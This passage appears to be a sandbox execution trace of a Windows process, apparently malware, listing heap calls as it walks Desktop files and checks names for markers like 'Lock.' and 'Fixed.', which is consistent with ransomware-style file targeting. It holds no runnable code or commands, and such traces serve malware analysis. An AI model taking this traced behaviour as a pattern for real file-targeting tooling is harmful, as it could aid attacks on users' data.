hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9846620, ftCreationTime.dwHighDateTime=0x1d4c974, ftLastAccessTime.dwLowDateTime=0xfa86340, ftLastAccessTime.dwHighDateTime=0x1d4d003, ftLastWriteTime.dwLowDateTime=0xfa86340, ftLastWriteTime.dwHighDateTime=0x1d4d003, nFileSizeHigh=0x0, nFileSizeLow=0x5d6d, dwReserved0=0x4d, dwReserved1=0x4, cFileName="gXTZQTDkC2czFZpWnC.gif", cAlternateFileName="GXTZQT~1.GIF")) returned 0 [0165.815] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0165.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.815] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0165.816] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.816] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0165.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.817] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0165.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.818] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24202f0 [0165.818] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/gXTZQTDkC2czFZpWnC.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gXTZQTDkC2czFZpWnC.gif", lpFilePart=0x8bf658*="gXTZQTDkC2czFZpWnC.gif") returned 0x3c [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0165.818] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gXTZQTDkC2czFZpWnC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gxtzqtdkc2czfzpwnc.gif")) returned 0xffffffff [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.819] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0165.819] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.819] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0165.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.819] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GyHm6iovQDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yHm6iovQDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hm6iovQDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m6iovQDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6iovQDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iovQDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ovQDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vQDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QDw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dw.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0165.820] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0165.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0165.820] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.820] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0165.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0165.821] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0165.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GyHm6iovQDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yHm6iovQDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.821] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Hm6iovQDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m6iovQDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6iovQDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iovQDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ovQDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vQDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QDw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0165.822] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dw.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0165.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0165.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0165.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0165.823] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0165.823] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0165.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0165.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0165.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0165.824] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.824] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0165.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0165.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13c8 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0165.826] 